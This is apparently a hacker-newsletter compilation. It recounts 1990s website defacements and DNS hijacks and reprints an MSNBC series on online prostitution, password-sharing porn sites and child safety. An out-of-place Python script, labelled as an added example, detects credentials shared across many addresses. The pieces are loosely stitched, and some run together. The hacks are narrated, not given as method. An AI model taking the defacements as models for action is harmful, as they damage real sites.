While no one was ever apprehended for this misdeed, the Kriegsman Furs hack will go down in history. Instead of claiming the usual motivations, such as self-aggrandizement, mischief, or the defense of some vague doctrine about digital freedom, these hackers led the way to hacking as a form of nonviolent political opposition.

Spoofing is the interception and jumbling of information from a content-providing Web server before it reaches a person browsing the site. This type of content manipulation, very popular in 1997, is relatively benign in that it doesn't actually affect the original server--and it's often very funny.

Interactive Hacking

Two of the best examples, in our opinion, were smeG and MetaHTML's Zippy server. In both cases, visitors were willing participants in the spoof. To start the fun, surfers would enter the URL of any site they wanted spoofed into a form at the spoofing site. The smeG server intercepted the content coming off a Web server and turned it into a mirror image of itself--with words, images, and layout all reversed. This made for some very perplexed surfers.

Harmless Gibberish

The Zippy server inserted random quotes from Bill Griffith's aphasic cartoon character into the text of a page. At first glance, the spoofed sites seemed perfectly normal. But as this Zippified extract from the White House's site shows, they weren't:

  Tipper Gore is the wife of Vice President Al Gore. I feel real SOPHISTICATED being in FRANCE! She is a well-known child advocate and actively involved with issues relating to mental health and homelessness. How do you explain Wayne Newton's POWER over millions? It's th'moustache&have you noticed th'way it radiates SINCERITY, HONESTY & WARMTH? It's a moustache you want to take home and introduce to Nancy Sinatra!

To participate in the mayhem yourself, pay a visit to the MetaHTML site and enter your favorite URL.

http://www.metahtml.com/apps/zippy/welcome.mhtml

When Network Solutions (also known as InterNIC) began charging $100 to register domain names in 1995, the company didn't make many friends among Web aficionados. Up until then, registering and maintaining domain names was free, and people objected to the fact that one company controlled so much Web real estate. There were a few alternatives to the InterNIC, one of which was AlterNIC, the brainchild of archhacker Eugene Kashpureff. AlterNIC offered a different way to register domains, but since InterNIC had a lock on .com domains, AlterNIC used alternatives, such as .ltd and .sex.

Please Use Alternate Route

In July 1997, Kashpureff used his knowledge of the domain name system (DNS) to divert traffic from Network Solutions. For one whole day, people who entered www.internic.net into their browsers found themselves not at the official domain registry but at AlterNIC. Kashpureff dubbed this maneuver Operation DNS Storm, and many applauded him for pulling it off. It was also illegal, and unlike most hacker/crackers, Kashpureff had left his fingerprints all over it by sending DNS traffic to his own domain. Sensing he was in trouble, Kashpureff fled his native Washington for Canada to escape the law. Eventually, however, he was arrested, arraigned, and found guilty of one count of computer fraud the following year. As for the battle over domain names, it's still raging, and AlterNIC, now overseen by Kashpureff's partner, is still providing an alternative.

Earlier this decade, several of ValuJet Airlines' planes crashed because of poorly maintained equipment. To separate itself from a name that had become synonymous with air disaster, the company became AirTran in 1997.
Under the banner headline "The Making of a New Airline," the company's Web site prominently featured a press release announcing the changes.

It'll Take More Than a Name Change

But the announcement only attracted hackers, who quickly attacked the site and littered the pages with sick, locker-room humor. The proud banner headline was replaced with "So we killed a few people. Big deal." The press release was similarly edited:

  ATLANTA, Sept. 24, 1997--ValuJet Airlines today changed its name to AirTran Airlines and along with its merger partner AirTran Airways introduced a new business strategy designed to bring dismemberment to a broader travel audience. The airline said that its objective is to make air travel more attractive to business travelers and even more convenient for suicidal maniacs. "Over the past year we've renewed our focus on the basics of our business with safety, reliability and operational excellence as our goal," lied Corr, who joined the carrier in November 1996... "AirTran's mission is to kill air travel customers who can actually afford to die. It's that simple."

The parody dipped into even more crass humor than these examples (if you can believe that).

Sick Jokes Will Prevail

AirTran promptly removed the hacked page, and the hackers were never caught. They did, however, send a copy of the page to 2600 Magazine for posterity. And the moral of the story is that no matter the medium, when it comes to mass tragedy, it's only a matter of time before the sick jokes start.

The New York Times is not a popular newspaper among hackers. The main reason is that Times writer John Markoff brought national attention to Kevin Mitnick's story--even cowriting the book Takedown with security expert Tsutomu Shimomura, who led the team that eventually nabbed Mitnick.

Don't Mess With Our Hero

A group calling themselves HFG (Hacking for Girliez) decided to engineer their own takedown. On September 13, 1998, the main page of the New York Times's site was replaced by an eccentric diatribe that attacked John Markoff and another writer working on a book about hackers. To the average person, this hack looked like gibberish, littered with mostly uppercase phrases like "TH1Z 0N3 IS F0R Y3W." Those able to decipher the hack could read that HFG was concerned not just with raising consciousness in support of Mitnick, but also with grandstanding about its own hacks. The hackers wrote of their own "rooting" exploits (that is, hacking the root directory of a server) at sites including those of Penthouse, Motorola, and an ISP in New Mexico. And those who made it to the end of the page found a statement that more interesting material could be found in the HTML source of the hack.

And by the Way, Here's Our Manifesto

Sure enough, the source contained comments in conventional spelling and capitalization, detailing HFG's beliefs and exploits and quoting liberally to bolster its position, as with this quote from G.K. Chesterton: "A good joke is the one ultimate and sacred thing which cannot be criticized. Our relations with a good joke are direct and even divine relations." In the end, the New York Times fixed its site, and the perpetrators got away, proving that even the most venerable of newspapers is no match for cybervandals with a grudge.

Hackers live for the opportunity to promote themselves. They love grandstanding. Some might say that they have a lot in common with Internet gossip columnist Matt Drudge.

Same Look and Feel

So it wasn't surprising when a group calling themselves United Loan Gunmen took a jab at the root directory of the Drudge Report on September 13, 1999. Except for a change to the site's banner--the title was changed to ULG Report--the front page maintained the spartan, almost graphic-free look of the regular Drudge Report.
The difference was in the headlines: the big banner read "United Loan Gunmen take control of Mike (sic) Drudge's data stockyard to once again show the world that this is the realm of the hacker." The top few headlines covered hacker issues, such as "Kevin Mitnick still in jail" and "2600 Magazine continues to get worse over the last year, and the Web page is still crappy to boot."

A Little Goes a Long Way

But except for those few changes, the site remained pretty much the same, with the site's search engine and links to Matt Drudge's regular column and archives still functioning. This may have been because the hack was a rush job, but it is noted in 2600 Magazine's Hacked Sites archive as a good example of a "less is more" hack. Once the smoke cleared, Drudge regained control of his root directory, and the unidentified hackers presumably went on to bigger and better hacks. As for the moral of the story, well, maybe just that Drudge got a taste of his own medicine.

A single hack launched an amazing career for "David Lightman," the teenage identity assumed by a 21-year-old man in the early 1980s. David began his hacking career by adjusting school grades on a high school computer, then went looking around for more challenging fare.

Taking on the Pentagon

He found it by accidentally logging on to a Department of Defense computer and initiating a program there called Global Thermonuclear War. Unbeknown to him, this actually gave him complete control over the U.S. nuclear arsenal. In his enthusiasm to explore the limits of the program, he threatened then-Soviet Russia with a nuclear standoff--and brought the world to the brink of destruction. Thankfully, disaster was averted, and David became quite a celebrity as a result. He began rubbing shoulders with Hollywood's glitterati, such as Michelle Pfeiffer, Jennifer Jason Leigh, and Meg Ryan. He also buddied up to Marlon Brando, Jim Carrey, George Segal, and James Earl Jones.

Plays a Hacker on TV

David Lightman's real name is Matthew Broderick, of course, and the role he played in 1983's WarGames was pure fantasy. Real-world hackers--despite their posturing, bluster, talents, and occasional good intentions--couldn't hope to get within a thousand yards of Meg Ryan. The closest they can aspire to is hacking the Internet Movie Database. But the social life of hackers aside, Lightman's make-believe hack is what catapulted hacking into the public consciousness and gave us the idea that hackers can take control of fundamental systems, such as the Department of Defense computers or the electrical grid. Hackers like to foster such misconceptions, but in reality, no one's ever come close to the computers that control the nuclear arsenal or any such system. And let's just hope no one ever does.

@HWA

40.0 MSNBC Special Report
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by UNREAL

An MSNBC Special Report entitled "Internet underground" really isn't all that special. They have gathered together a lot of old content and repackaged it under a new heading and then called it a special report. Unless you have been living in a cave the last six months I wouldn't bother. (Actually this may be months old, first time I have seen it.)

MSNBC
http://archive.msnbc.com/modules/hacking/default.asp

Step warily into the Internet Underground, home to sex traders, scam artists, hackers and “crackers,” and a place where you had best watch your back and keep an eye on your kids.

SEX: The seedier side of the net's underbelly...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

By Mike Brunker
MSNBC

June 2 — Demonstrating the adaptability that helped earn it the title of “world’s oldest profession,” prostitution is thriving on the Internet, slipping into comfortable new guises like sex-for-money chatrooms and Web sites showcasing fancy call girls and boys.
But with the continued expansion of the online sex trade, and the appearance of numerous civilian vigilante groups determined to halt its spread, pressure is building to rein in the hustlers and hookers of cyberspace.

THE USE of the Internet to advertise prostitution has received far less attention from law enforcement, politicians and the media than its notorious cousin, online pornography. But workers on the front lines of cybercrime say it is a growing concern, particularly when it involves minors selling their bodies to the highest bidder in chatrooms.

Crusaders like Pete Hampton, a former lawman who established the Web Police to serve as an online clearing house for complaints of online criminal activity, say that when they attempt to bring prostitution cases to the attention of authorities, they are often met with indifference. “We find very few will even touch it,” Hampton said.

A DIFFICULT ISSUE

“It’s hard to bring this issue to an investigative agency’s attention,” agreed Linda Fairstein, chief of the sex crimes prosecution unit of the Manhattan District Attorney’s Office. “...Government resources, especially with local police agencies, don’t begin to compare with what Web-literate people can do in terms of crime, prostitution in many ways being the least of it.”

Federal authorities, however, insist that they have quietly been pursuing the most serious cases for some time. Peter Gulotta, head of the FBI’s Innocent Images task force in Baltimore, told MSNBC that the bureau is currently pursuing several cases involving online prostitution rings that extend across state lines, a prerequisite for federal involvement. Similar cases have been brought in Dallas, Miami and Boston over the past several years, he said.

Federal cases have almost exclusively focused on cases involving children, but local authorities are beginning to demonstrate a limited interest in virtual vice. Police in Florida, Nebraska and New Jersey have in recent months busted at least five online “escort” services that allegedly were providing sex for money. Only one involved minors: A case in Palm Beach County, Fla., in which 27-year-old Jay Ryan Quinn stands accused of prostituting underage runaway girls through his Web site.

There are no numbers to quantify the prevalence of prostitution operations on the Internet, as neither the federal government nor the states keep track of such cases. But Hampton, of the Web Police, says he and his staff receive an average of 50 to 75 reports of prostitution each week out of a total of 1,500 complaints.

Echoing the complaints of police departments around the world, Hampton says he and his staff engage in triage to focus on the most important cases — those involving children. “We have to prioritize,” he said. “... If this is simply a matter of a call girl service or an individual female advertising her services on the Internet, and she’s of legal age of consent, this is not a priority case. If this is someone advertising child prostitution or selling children on the Internet, it does become a priority case.”

A DECOY’S VIEW

Donna, a volunteer undercover decoy who lures chatroom pedophiles into the arms of police, says anyone who doubts how widespread the online sex trade has become should try posing as a 15-year-old girl in an adult chatroom like AOL’s “Barely Legal” forum.

Donna, a concerned parent, goes undercover to prowl chatrooms for pedophiles.

“I can count to 10, and by that time I’m already being hit on,” said Donna, who asked that her last name not be used to diminish the threat of retaliation from those she has helped prosecute. “... Individuals are coming in and sending me private messages asking me, ‘Do I like 40-year-old men?’ and asking me about different sexual situations. I’ve had them mail me plane tickets. I’ve had them offer me their condo on the beach if I just come stay for the week. Anything, anything that a child will want.

“If you’re a troubled teenager, it’s an absolutely easy way to make quick money. ... You can almost have an auction. You can sit there and say, ‘Well, this guy just offered me 50 bucks.’ ‘Well then, I’ll offer you $100.’ And she can barter herself and set the time and place. How easy is that?”

In the Quinn case, the tip that launched the investigation came from one of the alleged hookers. But more and more often, citizen vigilantes like Donna and agencies that focus on sexual abuse of children are playing a key role in bringing prostitution cases to the attention of authorities — and in particular, those that involve minors.

Ruben Rodriguez, director of the National Center for Missing and Exploited Children’s Cyber Tipline, said his staff has seen substantial growth in the number of pedophiles using chatrooms to lure unsuspecting children and teens into situations where they are likely to turn to prostitution.

-=-

Sex Password Sites
~~~~~~~~~~~~~~~~~~

Password sites: free thrill or a ploy?
They may look illicit, but some are in cahoots with pay sites

The 70 to 75 password sites on the Web have similar appearances -- and content.

By Mike Stuckey
MSNBC

Pssst! Hey, buddy, wanna look at the latest, greatest Internet porn for free? Pictures, videos, erotic stories and live sex chats — it’s all yours for nothing.

LURKING AMONG thousands of sites in the World Wide Web’s red-light district are some that appear to offer an extra layer of illicitness. So-called “password” sites have proliferated for years, appearing to grant their visitors free access to a cornucopia of otherwise expensive adult content. In truth, however, while some adult Webmasters rail against the password sites, others are in league with them and actually use them as part of their marketing efforts.

The password sites have a similar look, with lists of adult Web site addresses, user names, passwords and critiques.
Often, surfers don’t even need to log in to the pay sites manually; instead, the password site operators code their lists so a single mouse click appears to take porno pirates right through security screens.

So what’s the attraction in ripping off a bunch of passwords to adult Web sites and giving them away? Money, naturally.

“Go to my site,” says one New Zealand Webmaster in a telephone call, “and I’ll give you a tour.” This entrepreneur — we’ll call him Joe — spoke with MSNBC on the condition that his name not be used and says he is “probably the biggest” password baron on the Web. “I do a million bucks a year.” That couldn’t be confirmed, but other password and pay-site operators generally confirmed his comments on how the business operates.

On this day, the first thing a surfer sees on Joe’s home page is a banner ad for a hard-core sex site.

PAY-PER-CLICK

“That’s pretty much the first way we make money,” Joe says. Like mainstream Web advertisers, porn peddlers pay for every click their banner ads generate. It doesn’t stop there. “If people go to that site and buy in we get half that money.”

More lucrative, says Joe, is the sale of the top positions in the password lists themselves. The first “purloined password” on his list is really an ad for a site that paid $14,000 for a month’s run. Users who click on it, in fact, are whisked to a page full of porn snippets and colorful exhortations to sign up for membership, nothing that any Web surfer can’t come across on his own. Joe also sells the second and third spots on his password list, which also take users to membership come-ons rather than actual password-protected porn.

Below the top three, however, are some passwords that appear to give users illicit access to adult content on pay sites. Among pay-site operators who have found passwords to their pages listed on such sites is Seattle-based Internet Entertainment Group, one of the kingpins in Web pornography.

“We’re very much against the password-theft sites,” says IEG President Seth Warshavsky, who points out that in addition to protecting revenue, passwords are intended to keep underage users from viewing pornography. “We actually quite regularly send cease-and-desist letters” to the operators of such sites.

IEG’s attorney, Derek Newman, provided MSNBC with a copy of a letter his firm sends to operators of Web sites that post passwords to IEG pages. Citing federal and state laws, the three-page document makes a number of legal threats to such Webmasters, from lawsuits to vast fines. “As a general rule, the password sites are very responsive to the cease-and-desist letters,” Newman says, and IEG has never sued one.

That’s true, say New Zealand-based Joe and other password-site operators. “We don’t need to run them. We just pull them off our sites.”

FTC STEERS CLEAR

The issue hasn’t appeared on the radar screens at the Federal Trade Commission, which has taken the lead role among U.S. agencies that investigate and prosecute fraud on the Web. An FTC spokeswoman says it would be considered a “business-to-business” issue, calling for civil action.

While Warshavsky believes password sites buy and hack for their wares, Joe and others say many of the passwords are simply given to them by users who signed up at a pay site and then felt ripped off. “There’s a lot of absolutely ruthless Webmasters out there,” Joe says, operations that overcharge users’ credit cards or greatly exaggerate the content on their sites. Password sites are “almost the crucible that people use to get them back,” says Joe.

Aside from simply being given the passwords, Joe and other Webmasters say, there are other ways to get them. Many sites simply copy passwords from other password sites. A British Webmaster tells of software that “basically just sits there, goes out every two to three hours and looks for passwords on every site and copies them.” A tour of password sites shows this to be true, with many of them listing the same sites, logons and passwords, sometimes in the same order.

HACKING FADES

Then there’s hacking, either by using programs to try many combinations of common user names and passwords over and over again or simply stealing entire files of passwords. But password posters say that as security has grown on the Web those methods are harder than they used to be and not employed as often.

Whether Webmasters like Joe are given the passwords or steal them, it’s up to pay-site operators to protect themselves, says one. Traci Earl operates a number of Netherlands-based adult pay sites and does business with password sites. “The problem is not password sites, which have always been around and are simply a fact of life in this business,” Earl says. “The real underlying problem is that of insecure passwords. Passwords get shared in offices, in bars, by email, by being posted to conferences and newsgroups and by a thousand other routes.”

Earl says there is a “simple, foolproof and highly necessary strategy for anybody who is serious about running adult pay sites” to deal with the problem of improper password use. All they need do, Earl points out, is run logging software that lets them know how often and from how many different locations user IDs and passwords are being used. It quickly becomes obvious when one is being abused and it can then be rendered inoperable.

‘IRRELEVANT’

“Serious adult webmasters know that once the problem of insecure passwords has been fixed then the password sites are at worst irrelevant and at best are a potential source of traffic,” says Earl. For Webmasters like Earl, that traffic has generated an “if-you-can’t-beat-’em-join-’em” attitude. That, says Joe, has led to a bit of a boom in password sites.
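The logging check Earl describes, written out as an added example (not code from the article or from any of the sites it names): for each user ID, count how many distinct client addresses used it inside a sliding time window, and flag IDs that exceed a threshold so they can be disabled. The log lines, site paths and addresses are constructed for the example; the window and threshold are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined-log style: client address, ident, authenticated user, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample access log for a hypothetical members area.
# alice: one address (normal); carol: home and office (normal);
# bob: four addresses in 15 minutes (the password has been posted or shared);
# dave: four addresses, but one per day (a traveller, not sharing).
SAMPLE_LOG = """\
203.0.113.10 - alice [04/Oct/1999:10:01:12 +0000] "GET /members/ HTTP/1.0" 200 5120
203.0.113.10 - alice [04/Oct/1999:10:03:40 +0000] "GET /members/pic1.jpg HTTP/1.0" 200 81920
203.0.113.25 - carol [04/Oct/1999:09:10:05 +0000] "GET /members/ HTTP/1.0" 200 5120
198.51.100.9 - carol [04/Oct/1999:09:40:51 +0000] "GET /members/ HTTP/1.0" 200 5120
198.51.100.7 - bob [04/Oct/1999:10:05:01 +0000] "GET /members/ HTTP/1.0" 200 5120
192.0.2.44 - bob [04/Oct/1999:10:05:30 +0000] "GET /members/ HTTP/1.0" 200 5120
192.0.2.91 - bob [04/Oct/1999:10:12:17 +0000] "GET /members/ HTTP/1.0" 200 5120
203.0.113.200 - bob [04/Oct/1999:10:20:02 +0000] "GET /members/ HTTP/1.0" 200 5120
192.0.2.150 - bob [04/Oct/1999:10:21:44 +0000] "GET /members/ HTTP/1.0" 401 401
198.51.100.20 - dave [01/Oct/1999:08:00:00 +0000] "GET /members/ HTTP/1.0" 200 5120
198.51.100.21 - dave [02/Oct/1999:08:00:00 +0000] "GET /members/ HTTP/1.0" 200 5120
198.51.100.22 - dave [03/Oct/1999:08:00:00 +0000] "GET /members/ HTTP/1.0" 200 5120
198.51.100.23 - dave [04/Oct/1999:08:00:00 +0000] "GET /members/ HTTP/1.0" 200 5120
203.0.113.77 - - [04/Oct/1999:10:30:00 +0000] "GET /index.html HTTP/1.0" 200 2048
"""


def parse_log(text):
    """Return (user, ip, datetime) for each authenticated request that succeeded (2xx).

    Unauthenticated lines (user '-') are skipped, as are failed requests: a 401
    from a stranger shows the password did not work there, so it says nothing
    about how many places the working credential is being used from.
    """
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("user") == "-":
            continue
        if not m.group("status").startswith("2"):
            continue
        when = datetime.strptime(m.group("ts"), TS_FMT)
        events.append((m.group("user"), m.group("ip"), when))
    return events


def find_shared_accounts(text, window=timedelta(hours=1), max_sources=3):
    """Map each abused user ID to the distinct client addresses seen in its busiest window.

    A user ID is reported when more than `max_sources` distinct addresses used it
    inside any single window of length `window`. The window is what separates a
    shared password (many addresses at once) from a legitimate user who moves
    around (many addresses over days).
    """
    by_user = defaultdict(list)
    for user, ip, when in parse_log(text):
        by_user[user].append((when, ip))

    flagged = {}
    for user, events in by_user.items():
        events.sort()                      # chronological, so each window scans forward
        busiest = set()
        for i, (start, _) in enumerate(events):
            seen = set()
            for when, ip in events[i:]:
                if when - start > window:  # sorted, so nothing later can fit either
                    break
                seen.add(ip)
            if len(seen) > len(busiest):
                busiest = seen
        if len(busiest) > max_sources:
            flagged[user] = {"sources": len(busiest), "addresses": sorted(busiest)}
    return flagged


if __name__ == "__main__":
    for user, info in find_shared_accounts(SAMPLE_LOG).items():
        print(f"disable {user}: used from {info['sources']} addresses within an hour: "
              f"{', '.join(info['addresses'])}")
```

Run over a real log, the output is the list of IDs to render inoperable; widening the window (for example to a week) also catches slow sharing, at the cost of flagging genuine travellers like dave.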
From a handful several years ago, the sector has grown into 70 to 75 sites, he and his European colleagues estimate. “We have half a million unique people come through our site a day.”

Joe himself will post passwords to his own pay sites as if they are “hot,” then kill them a short time later. Users quickly flood the pay site and some will sign on as paying customers, he says.

Other pay-site Webmasters use ruses in conjunction with getting their passwords posted on sites like Joe’s. One is to send users who attempt to use “illicit” passwords to an ominous warning screen that tells them their identity has been noted and they will be in big trouble for trying to use a stolen password if they don’t sign up at once for a paid account. “It’s a load of rubbish,” says one European password-site operator. “It’s just a way to get you to join.”

But such tactics work, says Earl, because “You have to remember that the customers for pay sites are not sophisticated surfers. They are, in the main, middle-aged and new to the technology.” That also explains the draw of password sites themselves. “The lure of something for nothing is very powerful,” Earl says. “In truth, there is very little available on pay sites that is not available for free somewhere on the Net if you have the skills and the knowledge to know where to find it.”

The password-site operators themselves have come up with some inventive ways to explain what they’re doing. A “disclaimer” on some of the sites notes that it is intended solely to alert pay-site operators that their passwords have been compromised. You can almost hear the winking.

Protecting your kids
~~~~~~~~~~~~~~~~~~~~

By Bob Sullivan
MSNBC

Many safety guides for children using the Net read as if they were written by Robert Fulghum. Everything I ever needed to know to stay safe in the virtual world, I learned in the real world. Don’t go scary places by yourself. If someone is making you uncomfortable, just leave, and tell your parents. Don’t look at pornographic pictures, and you won’t have to worry about them. But most important — don’t talk to strangers, and never give them personal information. Unfortunately, it’s not that simple.

IF IT WERE SIMPLE, you can bet that earlier this month there wouldn’t have been 100 alleged pedophiles arrested and tens of thousands of pictures of children — as young as 2 years old — seized.

It’s not simple because strangers online are hard to identify, since the Net is the land of make-believe. And just as kids are often better than their parents at playing make believe, they’re often better at keeping up with technology, too.

Some are tempted to dismiss the problem as no different from your teen-age son sneaking a peek at Playboy — on paper, or online. No big deal. True, experts say. The problem is not nudie Web sites. Most of those require credit card numbers, anyway. “Pictures don’t hurt kids,” said Parry Aftab, author of “A Parent’s Guide to the Internet.” “People hurt kids…. As long as parents think the only real risk is the kids will see adult sex content, they won’t do anything.”

The real problem is people who lurk in chat rooms and Internet Relay Chat (IRC) channels who hope to lure your child into having online sex or a face-to-face meeting. It’s impossible to say how many pedophiles there are lurking on the Net, but if you doubt the severity of the problem, log on to almost any IRC channel. You’re unlikely to last 60 seconds without being propositioned.

U.S. customs agent Marcus Lawson pretends to be young boys or girls for a living. He arrests about 30 pedophiles a year — as big a caseload as he can handle. When MSNBC interviewed him, he was working an IRC “dad-daughter sex” channel. There were 73 users. (“Hmm. He wants to know if my daughter has breasts yet. I’ll tell him no.”)

“I don’t think the Internet has created more pedophiles. It’s removed the societal stigma that kind of kept people in check,” he said. “Before the Net, pedophilia was a lonely business. Now 24 hours a day, seven days a week, you can validate yourself, find hundreds and hundreds of people who will tell you there’s nothing wrong with having sex with children.”

So the real trouble for your kids begins not with information coming into your computer but with what goes out of your computer. The problem is what your child says in e-mail, posts to a bulletin board or writes in a chat room. And this is where things get complicated.

Think you can simply tell your child not to e-mail strangers? This reporter was put in a very uncomfortable situation doing this story. The bulletin board thread related to this piece had an entry from a poster identifying herself as a 17-year-old girl who felt her parents were too controlling — they read her e-mail, observed her online, etc. MSNBC felt it necessary to write to the girl to confirm her identity and age as authentic. But that left us in the uncomfortable situation of sending an e-mail to a minor, asking her to call us or send us her phone number. That’s exactly what she shouldn’t do. For better or worse, she did not respond to our e-mail. Her posting is included in the sidebar of your BBS postings.

What else can go wrong?

ONLINE COMMERCE: The Internet is a defrauder's heaven. The Federal Trade Commission offers a number of suggestions.
HATE GROUPS: There's lots of negative racial, ethnic, religious, or gender-based propaganda on the Net - sometimes it's well disguised.
LOSING YOUR IDENTITY: Know that it's easy for someone else to pose as you on the Net.
SPAM: Just an annoyance, but a growing one.
VIRUSES: It's easy to pick up a virus using the Internet, even just reading your e-mail.
HOAXES: The Internet has raised the Urban Legend to new heights.
HARASSMENT: Even though it's just bits and bytes, it's still harassment if you tell someone to leave you alone and they don't. More.. Many authorities suggest using technology to combat technology. About 75 percent of the parents responding to MSNBC’s survey said they’d consider using software to limit their child’s ability to communicate with others over the Internet. Filtering software like NetNanny, for example, can be set to prevent children from even typing personal information such as their name, address and phone number. But users responding to an MSNBC survey were evenly split over whether they’d read their child’s e-mail, as was suggested by the FBI when it issued a parent’s guide to the Net on Sept. 1. “I _HONESTLY_ wonder if most of you realize what you are saying when you say read your kids e-mail,” said David Weaver on the MSNBC Technology BBS. “Reading a kids e-mail is like: Reading normal mail they send Evesdropping on all thier conversations Picking up another phone line when they are on the phone.” One response: “Hands off parenting is not the answer. Blind trust and faith are why you see kids pictures on the back of milk cartons. Now, keep in mind I am not going to go through all their mail every night. They should just be prepare to answer for anything if and when I do.” See a collection of posts to the BBS Stretch that adult monitoring of e-mail argument one step further — Clay Slape of Big Springs, Texas, is incensed that his daughter’s school sent home information saying the district reserves the right to read student e-mail. “If my child writes me a personal e-mail, I don’t want some teacher reading it,” he said. Big Springs Independent School District officials say the point is moot because students aren’t allowed e-mail at all in the district — but the regulation comes from the state department of education, so expect concerned parents all around Texas to wonder out loud about their child’s First Amendment rights. 
While three-quarters of MSNBC respondents said they’d consider technological help, few actually use it. Filtering software has so far been a bust. A FamilyPC survey published late last year indicated only 4 percent of parents use parental control software. A survey of Baltimore school district parents done earlier this year produced similar results. Net filtering software PC Magazine editors preferred Cyber Snoop, noting that parents can modify the list of restricted sites. Most products keep their lists a secret. NetNanny also allows access: Program Check MSNBC for reviews on these products - Ed Cyber Patrol www.cyberpatrol.com Cyber Snoop www.pearlsw.com CYBERSitter www.solidoak.com Cybersentinel www.securitysoft.com Net Nanny www.netnanny.com SurfWatch www.surfwatch.com Time's Up www.timesup.com WatchDog www.sarna.net/watchdog WebChaperone www.webchaperone.com X-Stop www.xstop.com These programs work in a variety of ways, but generally either block your computer from a predetermined set of yucky Web sites; limit your computer to a predetermined list of Web sites; or block individual Web pages with offensive words. It’s easy to see the limitations of all three, and apparently parents have, too. Aftab, who thinks filtering software can be an aid for parents, says some mistakenly believe the software is too technical to use or easy for clever kids to foil. Or they shrug and say, “I trust my kid.” But experts say parents often aren’t really aware of the extent of the trouble their kids can get in on the Internet. That’s why this week is National Kids Online Week, and AOL’s Steve Case and Secretary of Education Richard Riley will be kicking off on Tuesday a nationwide parental education program called “America Links Up.” And that’s why Seattle police detective Leanne Shirey starts her seminars for parents by posing as a 14-year-old girl in an AOL chat room. She then lets parents watch as a pedophile “grooms” her. There’s never a need to fake the demonstration. 
“The problem is we educated kids before we educated the parents,” Shirey said. “Some of these people I see have never turned on a computer. They have to understand that even if they don’t have a computer at home, they have to have rules.”

More safety resources

If you see evidence of illegal activity, call local police and/or write to cybersmuggling@customs.sprint.com

http://www.safekids.com
  Has tips for parents, including advice on handling the Net posting of the Starr report. Operated by Larry Magid, a syndicated columnist for the Los Angeles Times, the site is sponsored by the Online Safety Project, funded by America Online, Network Solutions and Disney.Com.

http://www.bcplonline.org/online
  Baltimore County schools' Parent Internet Education site. Includes a sample curriculum.

http://www.americalinksup.org
  Home page for the organization sponsoring National Kids Online Week events. Includes a searchable database of about 100 local educational events. Also includes a sample curriculum.

http://www.fbi.gov/tips.htm
  FBI's "A Parent's Guide to Internet Safety"

http://www.cyberangels.org/
  Volunteer Internet watchdog organization that maintains lists of kid-friendly sites. Founded by Curtis Sliwa, Guardian Angels founder.

Baltimore County Public Schools held an America Links Up “teach-in” for parents Sept. 14. Coordinator Della Curtis says the survey of parents in the 104,000-family district showed that most don’t know what their children are doing in school with the Internet, and that lack of information is a chief cause of anxiety.

“I know of one parent who … took the keyboard with her when she left the home,” Curtis said. You might call that filtering hardware. Not terribly constructive.

Here’s a collection of suggestions from several experts that’s a little more practical:

There is no substitute for keeping up with the technology. Don’t shrug or say it’s beyond you. If it is, ask your children to train you. That will make sure you keep up with them.
Learn how to examine your Web browser’s history file and its cache. The cache keeps copies of recently viewed pages, so it records where a browser has been even after the visible history has been cleared. Even if you don’t do it, make sure your children know it’s possible for you to know where they’ve been. For Netscape Communicator, for example, the Cache folder lives under the Netscape program directory (typically C:\Program Files\Netscape\).

Look around your desktop, start menu or applications folder for suspicious programs.

Keep abreast of all your child’s e-mail accounts; understand that free Web e-mail may allow your child to have plenty of e-mail accounts you don’t know about.

If your child will chat, take some time to come up with an alias, or fake name. Aftab even suggests you give them a fake address and phone number so, if they’re being harassed, they have a way of vacating the situation.

Play around in Usenet and IRC chat rooms so you can talk to your children intelligently about them, and perhaps decide to ban their use. Contact your Internet provider to see what kind of Usenet groups are available; IRC client programs can be downloaded from the Web.

Of course, the Robert Fulghum-style advice is useful. Do the things you would normally do in the real world. Get to know your children’s cyberfriends, and certainly don’t let them meet anyone in person without your attendance.

-=-

Sex toys blaze tactile trail on Net
Adult industry’s newest twist: Devices that vibrate, tickle at click of a mouse

Vivid Entertainment Inc. hopes to begin selling its "cyber sex suit," which comes in both male and female models, early next year.

By Mike Brunker
MSNBC

Oct. 4 — This is clearly not what AT&T had in mind, but entrepreneurs in the online sex industry have figured out a way to use the Internet to literally reach out and touch, tickle, buzz or scratch someone. And while “cyberdildonics” and the “cyber sex suit” may not move the Earth outside the world of online sex, as the first products to explore the Net’s tactile possibilities they are likely to touch off a commercial land rush to the new frontier.
THE ONLINE SEX industry has long played a pioneering role in moving innovative Net technology like live video and interactivity into the mainstream. The creators and users of the cyberdildonics and the cyber sex suit say they expect their products to continue that trend.

“If you can control a sex toy through your monitor, you can control just about anything,” said Allen Hadazy, president of SafeSexPlus.com, which has reported brisk sales of the cyberdildonics devices since their debut in April. “Controlling devices remotely through an everyday Internet connection isn’t the future. It’s here now.”

But some observers of the technology sector say the primitive state of tactile technology relegates the latest in orgasmic gadgetry to the curiosities category.

‘IT DOESN’T REALLY EXIST’

“I’m interested in why people are fascinated with this idea (sex at a distance), even though it doesn’t really exist and may never exist at that realistic, immersive level,” said author Howard Rheingold, who first used the term cyberdildonics in his 1991 book “Virtual Reality.”

The two devices employ very different strategies to reach their goal, which the creators of the cyberdildonics sex toys have dubbed “feel-good Internet.” In their case, the developers simply took an offline technology, electric vibrators and other sex toys, and created a devilishly simple but clever system that allows their speed to be controlled over an Internet connection.

"It’s going to be very beneficial, I imagine, for military couples, and I think (there is) going to be a day when these toys are given as bachelor and bachelorette gifts much more than lingerie and strippers and stuff,” said Cheyenne, an adult-site webmistress who offers customers the option of using cyberdildonics in video-chat sessions.
SENSORS IN A NEOPRENE BODYSUIT

The cyber sex suit, on the other hand, is strictly a for-the-Net creation: a neoprene bodysuit equipped with 36 sensors that, at the click of a mouse, can deliver a handful of sensations to the wearer.

"It may bring you to full orgasm; it may not,” said Lisa, a model who has served as a test subject for the cyber sex suit, which is expected to go on sale early next year. “... It’s not about that. It’s more about playing with your partner.”

